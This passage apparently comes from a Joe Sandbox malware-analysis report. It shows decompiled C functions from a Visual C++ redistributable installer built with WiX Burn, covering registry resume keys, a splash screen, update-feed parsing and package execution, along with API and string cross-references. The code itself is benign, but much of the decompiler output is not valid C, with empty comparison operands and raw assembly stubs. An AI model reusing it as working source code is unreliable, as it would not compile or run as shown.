                                                                          											_t79 =  >=  ? 0x80004005 :  <=  ? _t59 : _t59 & 0x0000ffff | 0x80070000;
                                                                          											E000137D3(0x80004005, "registration.cpp", 0x4d7, _t79);
                                                                          											_push("Failed to delete run key value.");
                                                                          											goto L25;
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									L8:
                                                                          									if( *((intOrPtr*)(_t77 + 8)) != 0) {
                                                                          										goto L17;
                                                                          									} else {
                                                                          										_push(L"burn.runonce");
                                                                          										_t20 = _t77 + 0x54; // 0x33ae900
                                                                          										_t79 = E00011F20( &_v12, L"\"%ls\" /%ls",  *_t20);
                                                                          										if(_t79 >= 0) {
                                                                          											_t24 = _t77 + 0x4c; // 0xa79f685
                                                                          											_t79 = E00050A88( *_t24, _a4, 0x20006,  &_v8);
                                                                          											if(_t79 >= 0) {
                                                                          												_t26 = _t77 + 0x10; // 0x6ae8fc75
                                                                          												_t79 = E00051392(_t71, _t76, _v8,  *_t26, _v12);
                                                                          												if(_t79 >= 0) {
                                                                          													_t28 = _t77 + 0x58; // 0x7f830000
                                                                          													_t79 = E00051392(_t71, _t76, _t70, L"BundleResumeCommandLine",  *_t28);
                                                                          													if(_t79 < 0) {
                                                                          														_push("Failed to write resume command line value.");
                                                                          														goto L25;
                                                                          													}
                                                                          												} else {
                                                                          													_push("Failed to write run key value.");
                                                                          													goto L25;
                                                                          												}
                                                                          											} else {
                                                                          												_push("Failed to create run key.");
                                                                          												goto L25;
                                                                          											}
                                                                          										} else {
                                                                          											_push("Failed to format resume command line for RunOnce.");
                                                                          											goto L25;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to write Installed value.");
                                                                          								goto L25;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to write Resume value.");
                                                                          						L25:
                                                                          						_push(_t79);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					E000554EF(_v12);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					RegCloseKey(_v8);
                                                                          				}
                                                                          				return _t79;
                                                                          			}















                                                                          APIs
                                                                            • Part of subcall function 000539CD: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 00053A1A
                                                                          • RegCloseKey.ADVAPI32(00000000,0A79F685,00020006,00020006,00000000,?,?,00000002,00000000,17886800,00000000,00000001,00000002), ref: 0001F2CB
                                                                            • Part of subcall function 00051344: RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,?,0001F11A,00000005,Resume,?,?,?,00000002,00000000), ref: 00051359
                                                                          Strings
                                                                          • BundleResumeCommandLine, xrefs: 0001F1D5, 0001F267
                                                                          • Failed to create run key., xrefs: 0001F1AA
                                                                          • Failed to delete run key value., xrefs: 0001F25A
                                                                          • Failed to write Resume value., xrefs: 0001F120
                                                                          • Failed to write resume command line value., xrefs: 0001F1EA
                                                                          • registration.cpp, xrefs: 0001F250, 0001F29D
                                                                          • Failed to write run key value., xrefs: 0001F1C8
                                                                          • Resume, xrefs: 0001F10F
                                                                          • Installed, xrefs: 0001F132
                                                                          • "%ls" /%ls, xrefs: 0001F172
                                                                          • Failed to format resume command line for RunOnce., xrefs: 0001F186
                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 0001F0AE
                                                                          • burn.runonce, xrefs: 0001F167
                                                                          • Failed to delete resume command line value., xrefs: 0001F2A7
                                                                          • Failed to write Installed value., xrefs: 0001F143
                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0001F0FA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValueVersion
                                                                          • String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$burn.runonce$registration.cpp
                                                                          • API String ID: 2348918689-3140388177
                                                                          • Opcode ID: ed8945c24a01806dbaaf0da7fd3437a41b5d242497d16405b77714f327eb0951
                                                                          • Instruction ID: 5a86ec8656279e8ac21d24f721b6ac390ccdc0274a572b0ae470f24b431c44ba
                                                                          • Opcode Fuzzy Hash: ed8945c24a01806dbaaf0da7fd3437a41b5d242497d16405b77714f327eb0951
                                                                          • Instruction Fuzzy Hash: 6C51DF36A8072AFADF21AAA4CC42BFF7AA5AF04750F144135FE00FA191D775DE9096C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 55%
                                                                          			E0002E177(void* __eflags, void** _a4) {
                                                                          				int _v8;
                                                                          				int _v12;
                                                                          				int _v16;
                                                                          				int _v20;
                                                                          				void _v24;
                                                                          				struct tagMSG _v52;
                                                                          				struct _WNDCLASSW _v92;
                                                                          				int _t47;
                                                                          				signed short _t58;
                                                                          				signed short _t61;
                                                                          				struct HWND__* _t67;
                                                                          				signed int _t69;
                                                                          				void** _t82;
                                                                          				void* _t83;
                                                                          
                                                                          				asm("stosd");
                                                                          				_t69 = 0xa;
                                                                          				_push(7);
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				memset( &_v52, memset( &_v92, 0, _t69 << 2), 0 << 2);
                                                                          				_t82 = _a4;
                                                                          				_t83 = E0002E05E(_t82[1],  &_v24);
                                                                          				if(_t83 >= 0) {
                                                                          					_v92.lpfnWndProc = E0002E31B;
                                                                          					_v92.hInstance = _t82[1];
                                                                          					_v92.hCursor = LoadCursorW(0, 0x7f00);
                                                                          					_v92.lpszClassName = L"WixBurnSplashScreen";
                                                                          					if(RegisterClassW( &_v92) != 0) {
                                                                          						_t67 = CreateWindowExW(0x80, _v92.lpszClassName, _t82[2], 0x90000000, _v20, _v16, _v12, _v8, 0, 0, _t82[1],  &_v24);
                                                                          						if(_t67 != 0) {
                                                                          							 *(_t82[3]) = _t67;
                                                                          							SetEvent( *_t82);
                                                                          							while(1) {
                                                                          								_t47 = GetMessageW( &_v52, 0, 0, 0);
                                                                          								if(_t47 == 0) {
                                                                          									break;
                                                                          								}
                                                                          								if(_t47 == 0xffffffff) {
                                                                          									_t83 = 0x8000ffff;
                                                                          									_push("Unexpected return value from message pump.");
                                                                          									L13:
                                                                          									_push(_t83);
                                                                          									E0005012F();
                                                                          									L14:
                                                                          									L15:
                                                                          									UnregisterClassW(L"WixBurnSplashScreen", _t82[1]);
                                                                          									if(_v24 != 0) {
                                                                          										DeleteObject(_v24);
                                                                          									}
                                                                          									return _t83;
                                                                          								}
                                                                          								if(IsDialogMessageW(_t67,  &_v52) == 0) {
                                                                          									TranslateMessage( &_v52);
                                                                          									DispatchMessageW( &_v52);
                                                                          								}
                                                                          							}
                                                                          							goto L14;
                                                                          						}
                                                                          						_t58 = GetLastError();
                                                                          						_t86 =  <=  ? _t58 : _t58 & 0x0000ffff | 0x80070000;
                                                                          						_t83 =  >=  ? 0x80004005 :  <=  ? _t58 : _t58 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "splashscreen.cpp", 0x8b, _t83);
                                                                          						_push("Failed to create window.");
                                                                          						goto L13;
                                                                          					}
                                                                          					_t61 = GetLastError();
                                                                          					_t89 =  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
                                                                          					_t83 =  >=  ? 0x80004005 :  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "splashscreen.cpp", 0x85, _t83);
                                                                          					_push("Failed to register window.");
                                                                          					goto L13;
                                                                          				}
                                                                          				_push("Failed to load splash screen.");
                                                                          				_push(_t83);
                                                                          				E0005012F();
                                                                          				goto L15;
                                                                          			}


















                                                                          APIs
                                                                            • Part of subcall function 0002E05E: LoadBitmapW.USER32(?,00000001), ref: 0002E094
                                                                            • Part of subcall function 0002E05E: GetLastError.KERNEL32 ref: 0002E0A0
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0002E1D8
                                                                          • RegisterClassW.USER32 ref: 0002E1EC
                                                                          • GetLastError.KERNEL32 ref: 0002E1F7
                                                                          • UnregisterClassW.USER32 ref: 0002E2FC
                                                                          • DeleteObject.GDI32(00000000), ref: 0002E30B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                                          • String ID: @Met$Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
                                                                          • API String ID: 164797020-3202933377
                                                                          • Opcode ID: a0aec76493d5d552925db1e155cdb18e664aed5497b6823c92764ec2a0a542c7
                                                                          • Instruction ID: d934ca2ac8cff9bfecdb557b3aa23309384b88a56d722865f19ea84d3334b55c
                                                                          • Opcode Fuzzy Hash: a0aec76493d5d552925db1e155cdb18e664aed5497b6823c92764ec2a0a542c7
                                                                          • Instruction Fuzzy Hash: 0B419D72A40769FFEB119BE4ED49AAFB7ADFF04311F100125FA05E61A0D774AE0486A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E00057FEC(intOrPtr _a4, signed int _a8, signed int _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				signed int _t100;
                                                                          				int _t101;
                                                                          				signed int _t103;
                                                                          				short** _t110;
                                                                          				int _t111;
                                                                          				signed int _t113;
                                                                          				signed int _t122;
                                                                          				int _t131;
                                                                          				int _t132;
                                                                          				int _t133;
                                                                          				signed int _t142;
                                                                          				int _t143;
                                                                          				int _t145;
                                                                          				int _t148;
                                                                          				signed int _t156;
                                                                          				int _t157;
                                                                          				intOrPtr* _t162;
                                                                          				signed int _t163;
                                                                          				signed int _t170;
                                                                          				short** _t173;
                                                                          				intOrPtr _t174;
                                                                          				signed int _t175;
                                                                          
                                                                          				_t162 = _a12;
                                                                          				_t170 = 0;
                                                                          				_t100 = 0;
                                                                          				_v8 = 0;
                                                                          				_t173 =  *(_a4 + 0x3c);
                                                                          				while(_t173 != 0) {
                                                                          					_t101 = CompareStringW(0x7f, 0,  *_t173, 0xffffffff, L"http://appsyndication.org/2006/appsyn", 0xffffffff);
                                                                          					__eflags = _t101 - 2;
                                                                          					if(_t101 != 2) {
                                                                          						L9:
                                                                          						_t100 = _v8;
                                                                          						L10:
                                                                          						_t173 = _t173[4];
                                                                          						continue;
                                                                          					}
                                                                          					_t131 = CompareStringW(0x7f, 0, _t173[1], 0xffffffff, L"application", 0xffffffff);
                                                                          					__eflags = _t131 - 2;
                                                                          					if(_t131 != 2) {
                                                                          						_t132 = CompareStringW(0x7f, 0, _t173[1], 0xffffffff, L"upgrade", 0xffffffff);
                                                                          						__eflags = _t132 - 2;
                                                                          						if(_t132 != 2) {
                                                                          							_t133 = CompareStringW(0x7f, 0, _t173[1], 0xffffffff, L"version", 0xffffffff);
                                                                          							__eflags = _t133 - 2;
                                                                          							if(_t133 != 2) {
                                                                          								goto L9;
                                                                          							}
                                                                          							_a12 = _a12 & 0x00000000;
                                                                          							_v16 = _v16 & 0x00000000;
                                                                          							_t170 = E00054A39(_t173[2],  &_a12,  &_v16);
                                                                          							__eflags = _t170;
                                                                          							if(__eflags < 0) {
                                                                          								L54:
                                                                          								if(__eflags == 0) {
                                                                          									L56:
                                                                          									return _t170;
                                                                          								}
                                                                          								L55:
                                                                          								E00057DA1(_t162, _t170, _t162);
                                                                          								E0003F670(_t170, _t162, 0, 0x40);
                                                                          								goto L56;
                                                                          							}
                                                                          							 *((intOrPtr*)(_t162 + 0x20)) = _v16;
                                                                          							_t100 = 1;
                                                                          							 *((intOrPtr*)(_t162 + 0x24)) = _a12;
                                                                          							_v8 = 1;
                                                                          							goto L10;
                                                                          						}
                                                                          						_t20 = _t162 + 0x18; // 0x18
                                                                          						_t170 = E000121A5(_t20, _t173[2], 0);
                                                                          						__eflags = _t170;
                                                                          						if(__eflags < 0) {
                                                                          							goto L54;
                                                                          						}
                                                                          						_t142 = _t173[3];
                                                                          						while(1) {
                                                                          							_a12 = _t142;
                                                                          							__eflags = _t142;
                                                                          							if(_t142 == 0) {
                                                                          								break;
                                                                          							}
                                                                          							_t22 = _t142 + 4; // 0x700079
                                                                          							_t143 = CompareStringW(0x7f, 0,  *_t22, 0xffffffff, L"version", 0xffffffff);
                                                                          							__eflags = _t143 - 2;
                                                                          							if(_t143 != 2) {
                                                                          								_t145 = CompareStringW(0x7f, 0,  *(_a12 + 4), 0xffffffff, L"exclusive", 0xffffffff);
                                                                          								__eflags = _t145 - 2;
                                                                          								if(_t145 == 2) {
                                                                          									_t148 = CompareStringW(0x7f, 0,  *(_a12 + 8), 0xffffffff, L"true", 0xffffffff);
                                                                          									__eflags = _t148 - 2;
                                                                          									if(_t148 == 2) {
                                                                          										 *((intOrPtr*)(_t162 + 0x1c)) = 1;
                                                                          									}
                                                                          								}
                                                                          								L25:
                                                                          								_t142 =  *(_a12 + 0xc);
                                                                          								continue;
                                                                          							}
                                                                          							_v12 = _v12 & 0x00000000;
                                                                          							_v16 = _v16 & 0x00000000;
                                                                          							_t170 = E00054A39( *(_a12 + 8),  &_v12,  &_v16);
                                                                          							__eflags = _t170;
                                                                          							if(__eflags < 0) {
                                                                          								goto L54;
                                                                          							}
                                                                          							 *(_t162 + 0x28) = _v16;
                                                                          							 *(_t162 + 0x2c) = _v12;
                                                                          							goto L25;
                                                                          						}
                                                                          						goto L9;
                                                                          					}
                                                                          					_t170 = E000121A5(_t162, _t173[2], 0);
                                                                          					__eflags = _t170;
                                                                          					if(__eflags < 0) {
                                                                          						goto L54;
                                                                          					} else {
                                                                          						_t156 = _t173[3];
                                                                          						while(1) {
                                                                          							_a12 = _t156;
                                                                          							__eflags = _t156;
                                                                          							if(_t156 == 0) {
                                                                          								goto L9;
                                                                          							}
                                                                          							_t8 = _t156 + 4; // 0x700079
                                                                          							_t157 = CompareStringW(0x7f, 0,  *_t8, 0xffffffff, L"type", 0xffffffff);
                                                                          							__eflags = _t157 - 2;
                                                                          							if(_t157 != 2) {
                                                                          								L7:
                                                                          								_t13 = _a12 + 0xc; // 0x74006e
                                                                          								_t156 =  *_t13;
                                                                          								continue;
                                                                          							}
                                                                          							_t11 = _t162 + 4; // 0x4
                                                                          							_t170 = E000121A5(_t11,  *(_a12 + 8), 0);
                                                                          							__eflags = _t170;
                                                                          							if(__eflags < 0) {
                                                                          								goto L54;
                                                                          							}
                                                                          							goto L7;
                                                                          						}
                                                                          						goto L9;
                                                                          					}
                                                                          				}
                                                                          				if( *_t162 != _t173 || _a8 != _t173) {
                                                                          					if(_t100 != 0) {
                                                                          						_t102 =  *(_t162 + 0x2c);
                                                                          						__eflags =  *(_t162 + 0x2c) -  *((intOrPtr*)(_t162 + 0x24));
                                                                          						if(__eflags < 0) {
                                                                          							L36:
                                                                          							_t174 = _a4;
                                                                          							__eflags =  *(_t174 + 8);
                                                                          							if( *(_t174 + 8) == 0) {
                                                                          								L38:
                                                                          								__eflags =  *(_t174 + 4);
                                                                          								if( *(_t174 + 4) == 0) {
                                                                          									L40:
                                                                          									_t103 =  *(_t174 + 0x1c);
                                                                          									__eflags = _t103;
                                                                          									if(_t103 == 0) {
                                                                          										L45:
                                                                          										_t102 = E000138D4( *(_t174 + 0x30) << 5, 1);
                                                                          										 *(_t162 + 0x3c) = _t102;
                                                                          										__eflags = _t102;
                                                                          										if(_t102 != 0) {
                                                                          											_a12 = _a12 & 0x00000000;
                                                                          											__eflags =  *(_t174 + 0x30);
                                                                          											if( *(_t174 + 0x30) <= 0) {
                                                                          												L53:
                                                                          												__eflags = _t170;
                                                                          												goto L54;
                                                                          											}
                                                                          											_t163 = 0;
                                                                          											__eflags = 0;
                                                                          											_a8 = 0;
                                                                          											do {
                                                                          												_t110 =  *((intOrPtr*)(_t174 + 0x34)) + _t163;
                                                                          												_v16 = _t110;
                                                                          												_t111 = CompareStringW(0x7f, 0,  *_t110, 0xffffffff, L"enclosure", 0xffffffff);
                                                                          												__eflags = _t111 - 2;
                                                                          												if(_t111 != 2) {
                                                                          													goto L52;
                                                                          												}
                                                                          												_t170 = E00057E36(_t163, _v16, ( *(_t162 + 0x38) << 5) +  *(_t162 + 0x3c));
                                                                          												__eflags = _t170;
                                                                          												if(__eflags < 0) {
                                                                          													goto L54;
                                                                          												}
                                                                          												_t175 =  *(_t162 + 0x38);
                                                                          												_t88 = _t162 + 0x30;
                                                                          												 *_t88 =  *(_t162 + 0x30) +  *((intOrPtr*)((_t175 << 5) +  *(_t162 + 0x3c) + 8));
                                                                          												__eflags =  *_t88;
                                                                          												asm("adc [ebx+0x34], eax");
                                                                          												_t174 = _a4;
                                                                          												 *(_t162 + 0x38) = _t175 + 1;
                                                                          												L52:
                                                                          												_t113 = _a12 + 1;
                                                                          												_t163 = _a8 + 0x28;
                                                                          												_a12 = _t113;
                                                                          												_a8 = _t163;
                                                                          												__eflags = _t113 -  *(_t174 + 0x30);
                                                                          											} while (_t113 <  *(_t174 + 0x30));
                                                                          											goto L53;
                                                                          										}
                                                                          										_t170 = 0x8007000e;
                                                                          										_push(0x8007000e);
                                                                          										_push(0x12c);
                                                                          										L35:
                                                                          										_push("apuputil.cpp");
                                                                          										E000137D3(_t102);
                                                                          										goto L55;
                                                                          									}
                                                                          									__eflags =  *_t103;
                                                                          									if( *_t103 == 0) {
                                                                          										L43:
                                                                          										_t122 =  *(_t174 + 0x1c);
                                                                          										__eflags =  *(_t122 + 8);
                                                                          										if( *(_t122 + 8) == 0) {
                                                                          											goto L45;
                                                                          										}
                                                                          										_t72 = _t162 + 0x14; // 0x14
                                                                          										_t170 = E000121A5(_t72,  *(_t122 + 8), 0);
                                                                          										__eflags = _t170;
                                                                          										if(__eflags < 0) {
                                                                          											goto L54;
                                                                          										}
                                                                          										goto L45;
                                                                          									}
                                                                          									_t68 = _t162 + 0x10; // 0x10
                                                                          									_t170 = E000121A5(_t68,  *_t103, 0);
                                                                          									__eflags = _t170;
                                                                          									if(__eflags < 0) {
                                                                          										goto L54;
                                                                          									}
                                                                          									goto L43;
                                                                          								}
                                                                          								_t66 = _t162 + 0xc; // 0xc
                                                                          								_t170 = E000121A5(_t66,  *(_t174 + 4), 0);
                                                                          								__eflags = _t170;
                                                                          								if(__eflags < 0) {
                                                                          									goto L54;
                                                                          								}
                                                                          								goto L40;
                                                                          							}
                                                                          							_t63 = _t162 + 8; // 0x8
                                                                          							_t170 = E000121A5(_t63,  *(_t174 + 8), 0);
                                                                          							__eflags = _t170;
                                                                          							if(__eflags < 0) {
                                                                          								goto L54;
                                                                          							}
                                                                          							goto L38;
                                                                          						}
                                                                          						if(__eflags > 0) {
                                                                          							L34:
                                                                          							_t170 = 0x8007000d;
                                                                          							_push(0x8007000d);
                                                                          							_push(0x10d);
                                                                          							goto L35;
                                                                          						}
                                                                          						_t102 =  *(_t162 + 0x28);
                                                                          						__eflags =  *(_t162 + 0x28) -  *((intOrPtr*)(_t162 + 0x20));
                                                                          						if( *(_t162 + 0x28) <  *((intOrPtr*)(_t162 + 0x20))) {
                                                                          							goto L36;
                                                                          						}
                                                                          						goto L34;
                                                                          					}
                                                                          					goto L15;
                                                                          				} else {
                                                                          					L15:
                                                                          					_t170 = 1;
                                                                          					goto L55;
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,000002C0), ref: 00058019
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 00058034
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 000580D7
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,00000018,0005B508,00000000), ref: 00058116
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 00058169
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,0005B508,000000FF,true,000000FF), ref: 00058187
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 000581BF
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 00058303
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString
                                                                          • String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                                          • API String ID: 1825529933-3037633208
                                                                          • Opcode ID: b6ea274b7c2433072512fee464aea507e8d84fdab66afc3fbfa7899b413c6661
                                                                          • Instruction ID: 518ee73df95034e2f2d5720c38aec19e261251fd14da35d57ef902c799def7da
                                                                          • Opcode Fuzzy Hash: b6ea274b7c2433072512fee464aea507e8d84fdab66afc3fbfa7899b413c6661
                                                                          • Instruction Fuzzy Hash: 61B19D71904702ABDBA09F54CC81F9B77F6AB44722F248614FD29EB2D2DB75E848CB04
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 72%
                                                                          			E00039BB3(void* _a4, intOrPtr* _a8, void* _a12, intOrPtr _a16, void* _a20, intOrPtr* _a24, void* _a28, intOrPtr _a32, intOrPtr* _a36) {
                                                                          				long _v8;
                                                                          				HANDLE* _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				HANDLE* _v24;
                                                                          				void* _v28;
                                                                          				signed int _t64;
                                                                          				intOrPtr* _t78;
                                                                          				long _t79;
                                                                          
                                                                          				_t79 = 0;
                                                                          				_v28 = 0;
                                                                          				_t78 = _a8;
                                                                          				_v8 = 0;
                                                                          				_v24 = 0;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				 *((intOrPtr*)(_a16 + 4)) = 0;
                                                                          				while(1) {
                                                                          					L1:
                                                                          					_t64 =  *_t78 - 1;
                                                                          					if(_t64 > 0xd) {
                                                                          						break;
                                                                          					}
                                                                          					switch( *((intOrPtr*)(_t64 * 4 +  &M00039E43))) {
                                                                          						case 0:
                                                                          							_t74 = _a24;
                                                                          							goto L28;
                                                                          						case 1:
                                                                          							__eax =  *(__edi + 8);
                                                                          							__esi = _a12;
                                                                          							_v28 =  *(__edi + 8);
                                                                          							 &_v28 = 0;
                                                                          							_v24 = __esi;
                                                                          							__eflags = __esi;
                                                                          							0 | __eflags != 0x00000000 = (__eflags != 0) + 1;
                                                                          							__eax = WaitForMultipleObjects((__eflags != 0) + 1,  &_v28, 0, 0xffffffff);
                                                                          							__eflags = __eax;
                                                                          							if(__eax != 0) {
                                                                          								__eflags = __eax - 1;
                                                                          								if(__eax == 1) {
                                                                          									__eax =  &_v8;
                                                                          									__eax = GetExitCodeThread(__esi,  &_v8);
                                                                          									__eflags = __eax;
                                                                          									if(__eax != 0) {
                                                                          										__eax = _v8;
                                                                          										__ecx = 0x8000ffff;
                                                                          										__eflags = __eax;
                                                                          										_push("Cache thread exited unexpectedly.");
                                                                          										__eax =  >=  ? 0x8000ffff : __eax;
                                                                          										L41:
                                                                          										_push(0x8000ffff);
                                                                          										_v8 = 0x8000ffff;
                                                                          									} else {
                                                                          										__eax = GetLastError();
                                                                          										__ax & 0x0000ffff = __ax & 0x0000ffff | 0x80070000;
                                                                          										__eflags = __eax;
                                                                          										__ecx =  <=  ? __eax : __ax & 0x0000ffff | 0x80070000;
                                                                          										__eax = 0x80004005;
                                                                          										__eflags = __ecx;
                                                                          										_v8 = __ecx;
                                                                          										__eax = E000137D3(0x80004005, "apply.cpp", 0x654, __ecx);
                                                                          										_push("Failed to get cache thread exit code.");
                                                                          										goto L36;
                                                                          									}
                                                                          								} else {
                                                                          									__eax = GetLastError();
                                                                          									__ax & 0x0000ffff = __ax & 0x0000ffff | 0x80070000;
                                                                          									__eflags = __eax;
                                                                          									__ecx =  <=  ? __eax : __ax & 0x0000ffff | 0x80070000;
                                                                          									__eax = 0x80004005;
                                                                          									__eflags = __ecx;
                                                                          									__ecx =  >=  ? 0x80004005 : __ecx;
                                                                          									__eflags = __ecx;
                                                                          									_v8 = __ecx;
                                                                          									__eax = E000137D3(0x80004005, "apply.cpp", 0x65f, __ecx);
                                                                          									_push("Failed to wait for cache check-point.");
                                                                          									L36:
                                                                          									_push(_v8);
                                                                          								}
                                                                          								goto L42;
                                                                          							} else {
                                                                          								__esi = _v8;
                                                                          								goto L6;
                                                                          							}
                                                                          							goto L43;
                                                                          						case 2:
                                                                          							goto L40;
                                                                          						case 3:
                                                                          							 &_v20 =  &_v16;
                                                                          							__esi = E0003A29B(__ebx, __edi, __ecx, 0,  &_v16, _a32,  &_v20);
                                                                          							_v8 = __esi;
                                                                          							__eflags = __esi;
                                                                          							if(__esi >= 0) {
                                                                          								goto L6;
                                                                          							} else {
                                                                          								_push("Failed to execute EXE package.");
                                                                          								goto L9;
                                                                          							}
                                                                          							goto L43;
                                                                          						case 4:
                                                                          							 &_v20 =  &_v16;
                                                                          							__esi = E0003A4A0(__ebx, __edi, __ecx, 0,  &_v16, _a32,  &_v20);
                                                                          							_v8 = __esi;
                                                                          							__eflags = __esi;
                                                                          							if(__esi >= 0) {
                                                                          								goto L6;
                                                                          							} else {
                                                                          								_push("Failed to execute MSI package.");
                                                                          								goto L9;
                                                                          							}
                                                                          							goto L43;
                                                                          						case 5:
                                                                          							 &_v20 =  &_v16;
                                                                          							__esi = E0003A5FB(__ebx, __edi, __ecx, 0,  &_v16, _a32,  &_v20);
                                                                          							_v8 = __esi;
                                                                          							__eflags = __esi;
                                                                          							if(__esi >= 0) {
                                                                          								goto L6;
                                                                          							} else {
                                                                          								_push("Failed to execute MSP package.");
                                                                          								goto L9;
                                                                          							}
                                                                          							goto L43;
                                                                          						case 6:
                                                                          							 &_v20 =  &_v16;
                                                                          							__eax = E0003A7B9(__ebx, __edi, __ecx, 0, __edx,  &_v16, _a32,  &_v20);
                                                                          							__edx = _v16;
                                                                          							__esi = __eax;
                                                                          							_v8 = __esi;
                                                                          							_v12 = __edx;
                                                                          							__eflags = __esi;
                                                                          							if(__esi >= 0) {
                                                                          								goto L29;
                                                                          							} else {
                                                                          								_push("Failed to execute MSU package.");
                                                                          								goto L9;
                                                                          							}
                                                                          							goto L43;
                                                                          						case 7:
                                                                          							_push(__ecx);
                                                                          							__esi = E0003AA9D(__edx, __ebx, __edi);
                                                                          							_v8 = __esi;
                                                                          							__eflags = __esi;
                                                                          							if(__esi >= 0) {
                                                                          								goto L6;
                                                                          							} else {
                                                                          								_push("Failed to execute package provider registration action.");
                                                                          								goto L9;
                                                                          							}
                                                                          							goto L43;
                                                                          						case 8:
                                                                          							_push(__ecx);
                                                                          							__esi = E0003A1F1(__edx, __ebx, __edi);
                                                                          							_v8 = __esi;
                                                                          							__eflags = __esi;
                                                                          							if(__esi >= 0) {
                                                                          								L6:
                                                                          								__edx = _v12;
                                                                          								goto L29;
                                                                          							} else {
                                                                          								_push("Failed to execute dependency action.");
                                                                          								goto L9;
                                                                          							}
                                                                          							goto L43;
                                                                          						case 9:
                                                                          							__ecx = _a20;
                                                                          							goto L28;
                                                                          						case 0xa:
                                                                          							__ecx = _a28;
                                                                          							L28:
                                                                          							 *_t74 =  *((intOrPtr*)(_t78 + 8));
                                                                          							goto L29;
                                                                          						case 0xb:
                                                                          							__eax =  *(__edi + 8);
                                                                          							__esi = 0;
